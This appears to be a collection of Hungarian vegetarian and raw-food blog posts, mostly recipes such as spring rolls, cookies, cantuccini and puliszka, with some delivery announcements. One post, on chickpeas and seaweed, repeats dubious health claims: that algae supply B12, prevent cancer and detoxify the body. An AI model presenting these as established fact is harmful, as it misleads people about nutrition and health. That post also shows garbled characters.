Jó ideje a szekrényemben pihentek a rizslapok, várva sorsukat. A héten ihletet kaptam, így délelőtt megvettem a többi hozzávalót és elkészítettem ezt a finomságot. Kaptam bio sárgarépát, bio kápiapaprikát, magyar újhagymát.... a végeredmény valami isteni lett... :) Csak mártogatom és mártogatom...mmm Tavaszi tekercs: rizstészta lap ( rizspapír) újhagyma felkarikázva sárgarépa julienre vágva uborka julienre vágva kápiapaprika julienre vágva avokádó szeletelve zsázsa csíra Egy tálba langyos vizet teszünk, beáztatunk egy rizstészta lapot. Ha már megpuhult ( kb. 1 perc) kivesszük, sima felületre fektetjük és a közepébe egymásra rétegezünk egy kis uborkát, paprikát, sárgarépát, majd a többi hozzávalót. Két oldalt behajtjuk a tésztát a zöldségekre, majd feltekerjük. Tálra tesszük. Tálaláshoz éles késsel félbe is vághatjuk. Mártogató: mokkáskanál miso fél citrom leve fél narancs leve reszelt gyömbér Mindent összekeverünk és kész.
A tuti kakaós csokis diós keksz
2012. január 28. Zizi kalandjai
Ha azon gondolkodtok, hogy milyen nasit süssetek holnapra a tea/kávé mellé vagy esetleg a vasárnap esti filmnézéshez, akkor ajánlom a tuti csokis-diós kekszet, amibe még mogyoróvaj is került. Meg fogjátok nekem köszönni. :) Langyosan fogyasztva a legjobb, amikor még a csoki olvadt benne. Ne szégyelljünk befalni belőle kettőt, hármat. Vagy négyet. Ha senki nem lát minket, lehet öt is. :) Gyerekkoromban háztartási kekszen, Pilóta kekszen és vaníliás karikán nőttem fel. Gondolom ezzel sokan vannak így. Érdekes, hogy akkor nem volt divat Magyarországon a kekszsütés (vagy csak én maradtam ki belőle?), pedig milyen egyszerű. Összekeverjük a száraz hozzávalókat, a nedves hozzávalókat, a kettőt összedolgozzuk, golyóbisokat formázunk és már irány is a sütő. Manapság viszont divat kekszet sütni. Vihetjük magunkkal iskolába, munkahelyre, moziba, utazáshoz, vendégségbe. Könnyű csomagolni, dobozban egy-két hétig elállnának, ha nem ennénk meg hamarabb! Süthetjük a családnak, barátoknak, szerelmünknek, gyerekünknek, rokonoknak vagy csak magunknak. Szeretetünk kifejezésének egyik eszköze lehet. Ízkombinációk tekintetében határ a csillagos ég. Kísérletezzetek és írjátok meg nekem, hogy nektek melyik a tuti receptetek! Tuti kakaós csokis diós keksz Hozzávalók: - 1 bögre tönköly fehérliszt, szitálva - 1/2 bögre teljeskiörlésű tönkölyliszt, szitálva - 1/2 bögre kakaópor (cukrozatlan), szitálva - 1 teáskanál szódabikarbóna - 1/2 teáskanál só - 1/2 bögre puha vaj - 1/2 bögre nádcukor - 1/2 bögre mogyoróvaj - 1 teáskanál vanília esszencia - 2 db bio tojás - 100 g 70%-os csokoládé, felkockázva - dió, felaprítva (A recepthez használt bögre 250 ml-es.) Egy tálban keverjük össze a száraz hozzávalókat: lisztek, kakaó, szódabikarbóna, só. Egy másik tálban keverjük habosra a vajat a nádcukorral. Adjuk hozzá a mogyoróvajat, jól keverjük el, majd kóstoljuk meg. Óvatosan, mert utána nehéz lesz abbahagyni! :) Adjuk hozzá a tojásokat, a vaníliát, majd öntsük az egészet a száraz hozzávalókhoz. Keverjük bele a csokit és a diót. Formázzunk golyókat a tésztából, sütőpapírral bélelt tepsire helyezzük, ahol a golyókat lelapítjuk a tenyerünkkel. Sülés során egy kicsit nőni fognak, így hagyjunk helyet két keksz között. 170 fokon kb. 10-15 percig süssük. Ellenőrizzük, nehogy megégjenek. Ebből a mennyiségből nekem 32 darab lett. További keksz receptek itt.
Házhozszállítás!
2012. január 11. Gitta nyersétel blogja
Eljött a nagy pillanat, hogy örömmel bejelenthetem: elindult az Élő ételek házhozszállítása a Vegafood közreműködésével! Aki nem tud eljönni a Tátra utcába, már az is meg tudja kóstolni a legfinomabb nyers ételeket, mert Magyarország legszínvonalasabb és legismertebb vegetáriánus étel házhoz szállító cége (a Vegafood) felvette a kínálatába a Nyersétel Akadémia termékeit. Mától leadhatod a rendelésed, és január 16-án már megkóstolhatod TE is! Nyers fasírt Meddig kell leadni a rendelést, hová szállítanak, minden lényeges információt megtalálsz a Vegafood holnapján a Rendelési információk-nál. Miket kínálunk? Zöld turmixokat, nyers fasírtokat, édességeket, sós ropogtatnivalókat és édes nasikat tudsz rendelni, amit plusz költség nélkül házhoz is szállítanak neked. a zöldséges korongból ilyen szendvicset tudsz csinálni magadnak (kenyér helyett ajánlom) A kínálatot fotókkal együtt megtalálod itt: Zöld turmixok Nyers fasírtok Csodás édességek Sós ropogtatnivalók Édes nassolnivalók
CANTUCCINI PISZTÁCIÁVAL ÉS MEGGYEL -TOJÁS NÉLKÜL!
Hogyan is jutottam el tegnap a bortól a cantuccini-ig: spontán vendégvárásba fordult a délután, és annyit tudtam, hogy vörösbort fogunk kortyolgatni. (Egyébként mindenkinek figyelmébe ajánlom az egri Bolyki János borait). Napközben online visszahallgattam a számomra érdekes hétvégi Kossuth rádiós műsorokat, és egy karácsonyi gasztronómiáról szóló beszélgetésben ejtettek szót egy sütiről, amit ilyenkor hagyományosan borral fogyasztanak itt Magyarországon. Nekem erről egyből Olaszország jutott eszembe: Pavia, a Ticino folyó partja, ahol egy kis Lambrusco, cantuccini és egyéb kekszek, valamint néhány egyetemista társaságában múlattam az időt jónéhány éve. A cantuccini pont az a keksz, amit nagyon szeretek, mert nem túl édes, de jó ropogós, és számtalan variációja létezik. Néhány hete leltem rá erre a tojás nélküli receptre a My new roots nevezetű blogon, amin még alakítottam egy kicsit. Így állt össze az én receptem: 2 bögre zabliszt 2 csapott tk foszfátmentes sütőpor 1 csipet só 1 bögre sötétbarna nádcukor 1/2 bögre almapüré (összeturmixolt alma) 2 ek kókuszolaj (olíva vagy más is lehet) 1 nagyobb bio mandarin héja 1 mk vanília 2/3 bögre pisztácia durvára vágva 1/2 bögre aszalt meggy 3 ek nyers kakaóbab töret A lisztet a sütőporral és sóval elkeverjük. A cukrot az olajjal és az almapürével dolgozzuk el, majd ezt a keveréket a liszthez adjuk. Hozzáadjuk a többi hozzávalót is. A tésztát két részre osztjuk és mindegyik félből baguette-t formálunk: 7-8 cm szélesre, kb 2cm magasra. Sütőpapírral bélelt tepsin 180C-ra előmelegített sütőben 25 percig sütjük. Ezután kivesszük a sütőből, annak hőmérsékletét visszavesszük 150 C-ra. 15 percig hagyjuk hűlni a sütit. Ezután kb. 1,5 cm vastagon felszeleteljük. Oldalára fektetve visszatesszük a sütőbe kb. 5-10 percig, amíg kissé megpirul, majd megfordítva a kekszeket a másik oldalukat is megpirítjuk. Itt a tojás szerepét az almapüré tölti be, és szerintem talán még finomabb is, mint a megszokott változat. Gyorsan elkészül, a magvakat, gyümölcsöket, fűszerezést tetszés szerint változtathatjuk a receptben. Tea, kávé és bor mellé is nagyon finom.
Birsalmasajtos sütemény és magyarázkodás
2011. december 9. Vera vega konyhája
Khmm... május 20 az utolsó bejegyzés dátuma. Nagy volt a szünet, és most sem ígérem, hogy vissza tudok térni, pedig szeretnék, de... Egyrészt gyakorlati, másrészt érzelmi okai is vannak az eltűnésemnek. Először a gyakorlati okok: tavasszal egy grandiózus házkeresési projektbe kezdtünk, aminek eredményeképp nyáron megtaláltuk a házunkat, azt kicsit átalakítottuk, majd beköltöztünk. Mindezt 4 gyerekkel. Nem ragozom, kemény menet volt, lassan kezdünk berendezkedni, ma pl. már megvettük álmaink szőnyegét is :) (2 hónapja kerestük) Nem igazán a főzés volt az első és legfontosabb ezekben az időkben, főleg nem a fotózás... Az érzelmi részéről: valahogy az utóbbi időben megcsömörlöttem a virtuális világtól. Nem tudom ezt pontosan megfogalmazni, azt érzem, hogy nem akarok benne valami miatt részt venni. Na de közben rendszeresen kapok visszajelzéseket, hogy a blog jó, hogy szükséges, hogy élvezetes. Mitévő legyek hát? Arra jutottam, hogy annyit adok, amennyit tudok. Ha összejön egy finom étel és még le is tudom fotózni, igyekszem feltenni. Ha nem, akkor eltűnök megint. Én sem szeretném, ha a blogon szereplő sok-sok ételleírás kárba veszne, márpedig érdeklődés hiányában ez megtörténhet, amennyiben nem táplálom az újra éhes olvasókat :) A táplálkozásunk is változatosan alakult az elmúlt hónapokban, de erről majd egy másik bejegyzésben írok. Jöjjön hát a recept! Hozzávalók: 25 dkg teljes kiőrlésű tönkölyliszt 2 tk sütőpor 1/2 tk szódabikarbóna 1 tk fahéj kb 10 dkg birsalmasajt, kis kockákra vágva 1 maréknyi dió durvára vágva 1 ek étkezési keményítő 10 dkg nádcukor 0,8 dl olaj 2,8 dl növényi tej Az összes hozzávalót tálban összekevertem, majd egy kisebb méretű sütőtálat kikentem és a tésztát beleöntöttem. 180 fokra előmelegített sütőben 30 perc alatt megsütöttem.
VegaFOOD - Budapest és Szeged
2011. október 4. Lét-tudatos konyha
Ha a munkahelyén nem megoldható az étkezés; ha nem szeretne vagy tud étterembe menni; de egészséges és finom ételt szeretne ebédelni, akkor mostantól Szegeden is lehetősége van ételt házhoz rendelni a VegaFOOD-tól. Szabadon válogathat a különböző ízvilágú (vegán, fitness, lúgosító, indiai, magyaros) vegetáriánus ételek és szendvicsek között. Ezen felül anticandidás menü, vagy cukormentes édesség is szerepel az étlapon. Sőt, most a megrendelőknek egy kis meglepetés is jár, ingyen italkuponokat adnak ajándékba. Részletek: itt
Rakott burgonya füstölt szalonnával
2011. augusztus 23. A vegán szépség
Ez az étel tökéletes kombinációja a hagyományos magyaros ízeknek, és a vegán konyha friss találékonyságának. Könnyen és gyorsan elkészíthető. Jó étvágyat! :) Hozzávalók: -1 kg burgonya -1 db közepes padlizsán -1 doboz zabtejszín(Oatly) -2.5 dl házi kókusztej -himalaya só, bors, füstölt édes-nemes paprika, tárkony, bazsalikom, szárított petrezselyem, bors -olíva olaj -5-6 gerezd fokhagyma -biomargarin
Balatoni Nyár :) az m1 műsorán a "Főzés nélkül finoman"
2011. július 30. Főzés nélkül finoman!
Ilyenkor nyáron :), na de komolyan nyár van, igaz nem látszik, mert két napja kabátban mentem vásárolni, szóval nyáron az m1 tv csatorna "délelőttjének egy része leköltözik" a Balatonra, és a Balatoni Nyár című műsorral szórakoztat bennünket. Erre a napra csodálatos időt kaptunk a teremtőtől :) Ennek a műsornak a részeként 2011.08.05-én 09.00 - 11.00 óráig a "Főzés nélkül finoman" személyemben meghívást kapott egy kis "főzőcskézésre", - rábólintottam rendben -, de mit eszünk majd? Nézegettem a fejemben meglévő választékot, és a következő menüsor született meg belőle: Receptek: Sárgadinnye-lekváros mandulás ,,süti Hozzávalók 4 személyre: 12 evőkanál darált mandula 4 evőkanál aranymazsola 4 evőkanál kókuszreszelék 4 szelet sárgadinnye (ajánlott 8 felé vágni az egész dinnyét) 4 db nektarin kevés vagy rengeteg fahéj A hántolt (a hántolatlan is kiváló) mandulát durvára őröljük, a sárgadinnyét daraboljuk, és az aranymazsolával pépesre daráljuk, majd a mandulával összekeverjük és félretesszük állni. A nektarinokat kisebb kockára vágjuk. 20-30 perc után a mandulás lekvárunkat összekeverjük a nektarinnal, majd négy kehelybe porciózzuk, fahéjjal, kókuszreszelékkel ízesítjük. Görögdinnye saláta pikánsan Hozzávalók 4 személyre: 4 szelet görögdinnye (ajánlott 8 felé vágni az egész dinnyét) 2 fej lilahagyma 8 evőkanál fekete olívabogyó 2 dl hidegen sajtolt olívaolaj 6-8 friss bazsalikom- és mentalevél kevés rózsaszín Himalája só A héjától megszabadított görögdinnyét ha zavaró akkor kimagozzuk, daraboljuk, a lilahagymát nagyolva összevágjuk, a bazsalikom- és mentaleveleket aprítjuk, sózzuk és bőségesen meglocsoljuk olívaolajjal vagy szőlőmagolajjal, majd az egészet az olívabogyóval összekeverjük (vigyázzunk a dinnyét ne törjük össze). Petrezselymes sárgarépa-pástétom magyarosan Pirított tönkölykenyér vagy zöldséges durumtészta Hozzávalók 4 személyre: 4 db sárgarépa 1 csokor petrezselyem 4 db paradicsom 4 evőkanál mandula 1/2 pár füstölt gabonakolbász 2 dl olívaolaj 1/2 kg tönkölykenyér vagy zöldséges durumtészta kevés rózsaszín Himalája só A sárgarépát kisebb darabokra vágjuk, ezzel a kíméljük a darálónkat, vagy a turmixgépet, a petrezselymet, paradicsomot is apríthatjuk előre, és a mandulát is elődarálhatjuk, majd hozzáadva az olajat, gabonakolbászt, sót krémesre daráljuk az egészet. Erősebb készülékeknél a receptben felsoroltakat együtt pépesítjük. Pirított tönkölykenyérre kenve tálaljuk vagy durumtésztára szószként (tésztához adva ajánlott egy kicsivel több olajat használni). Szeretettel várlak benneteket a képernyő elé a fent megadott időben, egy kis közös "főzőcskére", kikapcsolódásra, ha elfoglaltságod vagy munka miatt nincs lehetőséget élőben nyomon követni a műsort, később is megnézheted majd az m1 videotárjában. (12perc 12 mp; 63 perc 53 mp :) Szeretet teljes öleléssel: Javed
Undok fiú zsemléje
2011. július 14. Kedves Kedvenc Receptjeim
Teljesen véletlenül találtam rá erre a receptre, több éve már, hogy elterjedt a magyar gasztrobloggerek körében. DE ettől még nekem új volt, kipróbáltam - és milyen jól tettem! :) Azóta is ez a család kedvence, egyszerűen megunhatatlan! Az eredeti recept Mademoiselle-től származik, illetve nem is tőle, hanem egy undok fiútól, aki egy hozzászólásban leszólta a DNK-t, mondván hogy az már lejárt lemez, ő 1,5 óra alatt létrehoz olyat, mint amit a DNK (Dagasztás Nélküli Kenyér - 12 órát kell keleszteni) tud. S valóban :) Hozzávalók (kb. 12 közepes méretű zsemléhez) 50 dkg finom liszt 25 dkg tk liszt 1 zacsi szárított élesztő (7 gr) 2,5 tk só 6 dl meleg víz 1 dl langyos tej 1 ek méz Elkészítés: A hozzávalókat a megadott sorrendben összekutyulod, és bár erős késztetést érzel arra, hogy még rakjál a masszához vizet (mivel tök folyós) NE tedd! Letakarva keleszted másfél órát, majd előmelegíted a sütőt 200 fokra, és teszel a sütő aljába egy hőálló tálba vizet (ez nagyon fontos a gőz miatt!!!) A megkelt tésztát alaposan lsiztezett felületre borítod, kb. 9-12 részre osztod (attól függően mekkora zsemléket akarsz), zsemléket formázol, majd mehetnek be a sütőbe kb. 25-30 percre. A formázáshoz: én úgy csinálom, hogy enyhén vizes kézzel belenyúlok a folyós masszába, és egy jó maréknyit kiveszek belőle, majd leplaccsantom egy szilikonos gyúródeszkára (illetve lapra), amire előzőleg leglább 5 dgk lisztet öntöttem. Beleforgatom a tésztát a lisztbe, majd egy gyors mozdulattal átplaccsantom a sütőpapírral bélelt tepsire, és kicsit még igazítok rajta, hogy szép kerek legyen (Nem szabad sokat nyomogatni, igazgatni stb. mert akkor nem lesz levegős, lyukacsos!! Kipróbáltam úgy is, hogy az 50 dkg volt a tk liszt, és a 25 dkg a sima, és úgy is eszméletlenül finom!
Te mit eszel Beni?
2011. május 15. Főzés nélkül finoman!
Ezt az írást egy testvéremnek ajánlom, aki több mint a könnyek a szemében, és több mint maga a fájdalom... Naponta többször teszik fel nekem a kérdést, hogy - Miért választottad a nyers táplálkozást? A válaszaim eleinte kimerítőek voltak és igyekeztem a kérdezőt meggyőzni a választott táplálkozási formám előnyeiről. Manapság egyszerűen csak annyit mondok, hogy - Ez a választásom. Természetesen a beszélgetések nem maradnak ennyiben, és hosszasan faggatnak, hogy csak volt valamilyen indok ami ebbe az irányba terelte az életemet. Ilyenkor válaszként, azért még mesélek régi érzésekről, eseményekről. A napokban elcsendesedve azon kaptam magam, hogy nem szeretnék és nem is tudok azonosulni a régi emlékképekkel, amelyek bizonyára sok testvéremet meggyőztek vagy meggyőznének választott utam helyességéről. Valahogy egyszerűen éreztem, hogy csak maga a példamutatás már elegendő. Hiszem, hogy a változásra nyitott és befogadó emberek sokasága él már a Földön és számukra a meggyőzésen jóval túlmutat az egyéni példamutatás, életforma. Érettségi banketten vagyok, nem átlagos, 31 éves. Érdekes emberek, akik a társadalom olyan metszetét mutatják, amely meglepné a társadalom kutatókat. Kiemelkedő személyiségek sokasága fontos beosztásban, hírességek, és szürke eminenciások, akik nélkül maga az élet lenne sivár és szürke, ráeszmélek szeretem őket... Éveken át osztottam az észt az ilyen összejöveteleken magyarázva gondolataim vagy akár a táplálkozásom helyességét. Talán két-három éve nem teszem, és megtörtént, amit nem vártam, aminek nagyon örültem. A csendben, egyszer csak felhangzott egy kérdés, a mellettem éppen vegetáriánus ételt fogyasztó volt osztálytársam kérdése - Te mit eszel Beni? Mások lehet, hogy azonnal azt válaszolták volna, hogy már ettem vagy még csak most fogok választani, de én megéreztem, hogy ez most más és a csendnek ez a válasza, most befogadóvá vált ismét valaki és figyel rám... Hogy mit? Amit választottam, zömében nyers zöldségeket, saját készítésű pástétomokat, salátákat, sületlenségeket (ahogy AnniPanni használja) de szeretem a vegetáriánus konyhát is. Ezen a blogon, és az életemben az átmenet konyháját igyekszem népszerűsíteni. Adni egy fogódzkodót a bizonytalanoknak, aki még nem döntöttek, de érzik, hogy egy másik útra szeretnének lépni. Már nem csak hiszem, de tapasztalom is, hogy megéri... Namaste Bendegúz
Hamis tonhal saláta (tonhalkrém)
2011. április 10. A vegán szépség
Csicseriborsó: Ennek a borsófélének ?shazája feltételezhet?en El?-Ázsiában volt, de már régóta elterjedt élelem a földközi-tengeri országokban. Dél-Amerikában, Indiában és Pakisztánban is vetik. F?leg azokon a területeken nagyon népszer?, ahol alig tudják megfizetni a húst, hiszen rendkívül magas a fehérjetartalma. 100 g csicseriborsó energiatartalma: 1276 kJ (305 kcal), tápanyagtartalma: 20 g fehérje, 3,4 g zsír, 48,6 g szénhidrát, 9,5 g rost, 27 mg nátrium, 580 mg kálium, 110 mg kalcium, 428 mg foszfor, 108 mg magnézium, 6,5 mg vas, 30 mikrogramm A-vitamin, 0,5 mg B1-vitamin, 0,15 mg B2-vitamin, 1,5 mg niacin, 0,54 mg B6-vitamin, 4 mg C-vitamin. A csicseriborsót ki is lehet csíráztatni. Megtörténik a csoda, hiszen ebb?l a k?kemény magból néhány nap múlva ropogós, enyhén édeskés íz? csíranövény lesz. 100 g csicseriborsóból kb. 200 g csíranövény lesz. A csíráztatáshoz napi kétszeri öntözés, szobah?mérséklet és kb. 3 nap kell, míg a csíra 3 mm-nyire meg nem n?, ezután azonnal fel kell használni, mert megkeseredhet. A csicseriborsót a jobb emészthet?ség miatt 5 percig blansírozni (=forró vízben rövid ideig f?zni), illetve olajon párolni kell. Tengeri alga: Az ókori görög mitológia szerint a szépség és a szerelem istennője, Aphrodité, egyedülálló szépségét, csillogó haját és ragyogóan selymes bőrét a tengervíznek és a benne rejlő kincseknek, a tengeri sónak, az iszapnak és az algának köszönhette. Azokon a helyeken, ahol rendszeres algafogyasztók élnek, az emberek kitűnő egészségnek örvendenek, és közülük kerülnek ki a hosszú élet rekorderei is. Ma az algákat a világ legnagyobb élelmiszer-tartalékaként tartják számon.Rendkívüli hatékonyságukat a tengervíz és az emberi vérplazma hasonló összetétele és ásványianyag-koncentrációja magyarázza, mivel a vérben oldott ásványi anyagok összetétele és aránya nagyon hasonló a tengervízben megtalálható anyagokéval. Valamennyi alga kedvező tulajdonsággal rendelkezik. oA több ezer cianobaktérium-algafaj közül kiemelkedő szerepet kapott a Föld legősibb élőlényei közé tartozó Spirulina Platensis. Fejlettségi szintjét tekintve közelebb áll a baktériumokhoz, mint a többi algához. oAz Achophyllum nodosum, vagyis a barnamoszat nagy szerepet kap az egészség megőrzésében, a betegségek megelőzésében és a gyógyulási folyamatok gyorsításában. oA Carrageen Chondrus Crispus, vagyis a vörösmoszat főleg magas vitamin- és nyomelem-koncentrációja, illetve rosttartalma miatt harmonizálja az anyagcsere-folyamatokat, serkenti a pajzsmirigyműködést, és fokozza az ellenállóképességet. Asztmatikus, reumatikus, gyomorbél-rendszeri problémákban és a fogyókúrában is igen sokat segít. A tengeri moszatok ma újra fontos táplálékká váltak. Magas fehérjetartalmuk miatt a Föld leggazdagabb fehérjeforrásának tartják őket. Megtalálható bennük valamennyi aminosav, és felhasználásuk is változatos: teheted őket salátákba, levesekbe, zöldség- és gyümölcslevekbe is. oMagas a jódtartalmuk - a jód a tiroxinhormon alkotórésze, amit a pajzsmirigy termel. Ez a hormon biztosítja a fiatalos külsőt, szabályozza az anyagcserét.oMagas az A-, B-, C-, D-, E- és K-vitamin tartalmuk. A B12-vitamin ritka a növényi élelmiszerekben, az algából viszont ezt is megkaphatod. A sokféle vitaminnak köszönhetően jó a sejteket vitalizáló és immunerősítő hatása is. oBéta-karotin-, klorofill- és szeléntartalmuk miatt szabadgyökfogóként fontos szerepet töltenek be az érelmeszesedés késleltetésében, a szervezet ellenállóképességének megerősödésében és a rák megelőzésében. oOlyan szénhidrátot tartalmaznak, amely védi a szervezetet a nehézfémtartalmú mérgek - stroncium, kadmium, plutónium, bárium - felszívódásától. oA spirulina bázikus hatású, a savtúltengéses gyomorbetegségek esetében is ajánlott, gyorsan érezhető a hatása. Csökkenti a szervezet savasságát, így hatékony gyógyítószer a méregtelenítésben. oAz algának enyhe vízhajtó hatása is van, és mivel magas a rosttartalma, javítja az emésztést is. oKimagasló az ásványianyag-tartalmuk: sok vas, foszfor, kálium, kalcium, magnézium, cink van bennük. Bórtartalmuk közvetve szerepet játszik a kalcium- és a magnézium-anyagcsere szabályozásában. oA bennük lévő zsírsavak csökkentik a vér zsírszintjét, mérséklik a vérlemezkék összecsapzódását, kismértékben növelik a védő koleszterint - HDL -, és értágító hatásúak. Lassítják az érelmeszesedést, és csökkentik a vérnyomást. oMivel táplálók, az algák a fogyókúra, a salaktalanítás idején táplálék-kiegészítőként alkalmazhatók. Ha fél órával az étkezés előtt algát eszel, fehérjetartalmának következtében az agy éhségközpontjába jelek érkeznek, így jóllakottságérzet kerít hatalmába. (forrás: Ideál magazin, elelmezes.hu) Jó étvágyat! :)
Vannak a világban a jóemberek
2011. március 31. Mentesreceptek
Nem, ne is próbáljátok nekem megmagyarázni, hogy mind jók is vagyunk meg rosszak is. Ma ezt nem hiszem el. Szóval vannak a jóemberek, mutatok is egyet itt ni, már amennyit a blogján keresztül látni belőle. Az ilyen jóemberek ráadásul csapatokat szerveznek, csupa jóemberből. Fogják a keverőtáljaikat, meg tepsijeiket, és a sütőtől átmelegedett konyhájukban addig szorgoskodnak, míg valami szemnek-szájnak csábos finomságot kisütnek. És odaadják jóembereknek, akik a süti árát koraszülött babák gondozására, vagy most éppen Down-szindrómás kisgyerekek fejlesztésére ajánják fel. Most megtiszteltek azzal, hogy engem is meghívtak maguk közé egy tortasütésre, így a 27 gasztroblogger altípusú jóember süteményei mellett az alábbi tortára is licitálhattok a segítsüti oldalán április 2-án szombaton 23:59-ig! Tudom, hogy jó helyen mondom el mindezt, mert ide is nagyon sok, blogolvasó jóember jár ;) Tojásmentes csíkos torta (tejmentesen is elkészíthető) Hozzávalók a lapokhoz egyenként: 9 dkg liszt 1/3 cs sütőpor 4 g 3 dkg cukor késhegynyi szódabikarbóna 1 dl víz 1 tk citromlé (fél citrom leve 3 felé) 1 ek olaj 5 ek dió / 5 ek mák / 4 ek kakaó a krémhez: 2 dl gríz 1/2 l tej 1/2 l víz 5-6 csapott ek cukor (1 ek rum) 10 dkg margarin a mázhoz: 1 tábla ét tortabevonó Elkészítés Összekeverjük a száraz hozzávalókat az egyik laphoz, majd beleöntjük a vizet, olajat és citromlevet. Elsimítjuk egy tortaforma aljában és 160 fokra előmelegített sütőben kb. 15 perc alatt megsütjük. Így járunk el a másik két lappal is. Amíg a lapok hűlnek, elkészítjük a krémet: a grízt megfőzzük a tej és víz keverékében, majd megcukrozzuk és egy ek rumot keverünk bele. Amikor kihűlt, habverővel belekavarjuk a margarint is, majd megkenjük vele a lapokat és a torta külsejét. A tortabevonót gőz fölött felolvasztjuk és a torta tetejére öntjük. A sütemény Napmátka ünnepi torta és KatAnyaka piskóta receptjének felhasználásával készült.
Kapros-zabpelyhes cukkcsanka (vegan)
2010. november 16. CsemetEledel
Nem ismerek olyan magyar embert, aki nincs oda a krumplimaciert, vagy lapcsankaert. Es nem ismerek olyan etelt sem, aminek ennyi neve lenne.:)) Szoval ha szeretitek a lapcsankat akkor a cukkcsankat imadni fogjatok. Hogy miert? Mert nem kell krumplit hamozni es elreszelni az ujjainkat, nem kell bele liszt se tojas, es egeszseges. nem hizlal. a gyerekeket sem. Suthetjuk nekik ebedre, martogatos szosszal, vagy hipergyors fozelek feltetnek, vagy csak ugy snack-kent ragcsalni, meg akar vacsorara is:) kell hozza: -ket kozepes cukkini -zabpehely (Alnatura bio Feinblatt ez :) -egy kisebb szal porehagyma -2 gerezd fokhagyma -egy csokor kapor -egy csokor petrezselyemzoldje -so, bors -keves olivaolaj Miota van robotgepem ami dagaszt aprit kever, mindent ebben csinalok. Az egyik legjobb befektetes volt, rengeteg energiat es idot sporolok meg vele. Igy a cukkcsanka elkeszitese kb 15 perc. A poret megmosom, nagyobb darabokra vagom es elhelyezem az apritoban a petrezselyemmel, a kaporra es a fokhagymaval. 1 -2 percig nyomom a gombot, mig nagyon apro nem lesz minden. Hagyom benne az edenyben. Kozben meghamozom a cukkinit es gyorsan lereszelem(sokkal egyszerubb mint a krumplit meg nem kell egy kilonyit hamozni es nem farad el a kezunk sem. kb 2 perc) . Jol besozom, es 5-10 percig allni hagyom. Azutan kinyomkodom belole a nedvesseget es a reszelt cikkinit az apritoedenybe helyezem.Beborsozom. Kicserelem az apritokest a muanyag keverore es es kb 3 percen keresztul nyomom a gombot. Ha ez kesz, akkor a robotgep kavedaralo reszet teleontom a zabpehellyel es porra(lisztte) orolom, majd az igy kapott zablisztet hozzaontom a cukkinis-hagymas masszahoz, es megint kb 2-3 percig nyomom a gep gombjat. egy nagyon kremes fuszeres laza, d osszeallo massza lesz belole. Teflonserpenyoben felhevitem a keves(nagyon keves) olajat es evokanalankent rahalmozom a masszat, jol ellapogatom es mindket oldalat aranybarnara sutom. Buntetlen orom. Jo etvagyat! :)
Tofus-tejszínes kuszkusz
A kuszkusz, mint alapanyag nem igazán ismert a magyar konyhában, vagy méltatlanul mellőzött, pedig fantasztikus kiegészítője, egytál ételeknek, salátáknak. Az arab konyha elképzelhetetlen nélküle. Ma már az enyém is.:) A gyerekem tésztamániás, azt sem bánná, ha minden nap tészta lenne. De akárhogy is próbálom variálni, a tészta csak tészta marad. Így jött a szószos kuszkusz ötlete, amit még kisebb kevesebb foggal rendelkező gyermekek is pürésítés nélkül fogyaszthatnak. Ja és ez az étel félóra alatt készen van. hozzávalók: -1oog organikus kuszkusz -1 fej hagyma -1 fél pritamin(v. kaliforniai)paprika -1oog füstölt tofu (pl. Alnatura DM-es) -2 dl növényi tejszín(pl zab, vagy rizs) -szójaszósz -só, bors, kicsi olívaolaj A tofut felkockázom(kisebb gyermekek esetén villával túróállagúra szétnyomkodom) és leöntöm szójaszósszal, elkeverem, és állni hagyom. A hagymát olíván megdinsztelem, majd rádobom a felkockázott pritaminpaprikát. Együtt párolom. Közben 1,25 deci vizet egy evőkanál olajjal elkezdek hevíteni egy kisebb teflonedényben. Ha jó forró, de még nem forr, beleteszem a kuszkuszt és jól elkeverem. Leveszem a tűzről és lefedem 3-4 percre vagy addig, míg a kuszkusz fel nem szívta az összes vizet. Ezután visszateszem a tűzre, kicsit megsózom(lehet adni hozzá egy kis ghí-t). Továbbra is letakarom, és nagyon alacsony hőmérsékletem, még 3-4 percig csak hevítem. Tulajdonképpen gőzölöm. Leveszem a tűzről és jól megkavarom. Kész is. Ha készen van a hagymás paprikás keverékünk, beletesszük a tofut, és 5 perc alatt készre sütjük. Felöntjük a tejszínnel, és még vagy 5 percig a tűzön hagyva kevergetjük. Miután kész a szósz összekeverjük a kuszkusszal. Melegen vagy akár hidegen is fogyasztható. Jó étvégyat!
Marcipános bonbon Mikulásra
2009. december 6. La Cuisine d'Adéle
Mikor először megláttam, Dolce Vita csodás bonbonjait, rögtön tudtam, hogy ezt nekem is ki kell próbálnom. Beszereztem a bonbon-formát, de a gyakorlati megvalósítás még váratott magára... Most viszont úgy gondoltam, miért ne hozhatna az én Mikulásom szemet gyönyörködtető, házi készítésű, garantáltan E-mentes apróságokat... A recept és az egész metódus fantasztikus! Amilyen hihetetlenül egyszerű, annyira mutatós és finom! Úgy kellett Anyunak elmagyaráznom, hogy ez nem bolti, hanem én magam készítettem, mert ránézésre - ahogyan Ő mondta - ,,annyira profinak tűnt. Csokit olvasztani, ,,marcipánt gyúrni, a kis kockákat megalkotni pedig annyira jó volt! Olyan igazi kikapcsolódás a sűrű, sokszor gondterhelt hétköznapokból... Dolce Vita receptjét hűen követtem. Annyi változtatás volt, hogy én 70%-os kakaótartalmú bio étcsokit (DM-Alnatura, nagyon finom és nagyon jó áron kapható) és bio nádporcukrot használtam. (A receptben szereplő arányokat követve azonban nekem a töltelék fele megmaradt, a 15 dkg csoki viszont tökéletes mennyiségnek bizonyult a 15 db bonbonhoz.) Szép, hangulatos dobozba csomagolva tökéletes, szívből jövő ajándék.
Túrós puliszka
2009. május 18. Cukor, bors, só
Ez egy erdélyi étel, puliszaklisztből készül, magyarul kukoricadarából: - kb. 500 gr puliszkaliszt, kukoricadara - egy liter víz, de lehet zöldséglé is - 250 gr juhtúró - 1 ek olaj (hidegen sajtolt a legjobb) - 1 kis doboz házi tejföl - esetleg zöldségek, aprított medvehagyma Egy liter sós vizet felforral, belekavar fél kiló (kb.) puliszkalisztet, és folytonos kavargatás közben megfőz. Jól ki kell degednie, mint a búzadarának. Egy tűzálló tálat vagy fazakat kiolajoz, és rétegesen lerak: egy réteg puliszka, erre rászór egy réteg juhtúrót, meglocsol tejföllel, majd ismét egy réteg puliszka, amíg elfogy. A tetején túró, tejföl, zöldség akár (bármilyen, ami jó, ha megsül). A sütőben megsüt, aztán melegen tálal , hozzá újhagyma, ecetes - kovászos uborka, cukros zöldsaláta, savanyúság - majd örül és eszik. Erdélyben szokták salátalevessel is enni. Jó étvágyat
Újabb francia város tiltja be a hízott libamájat
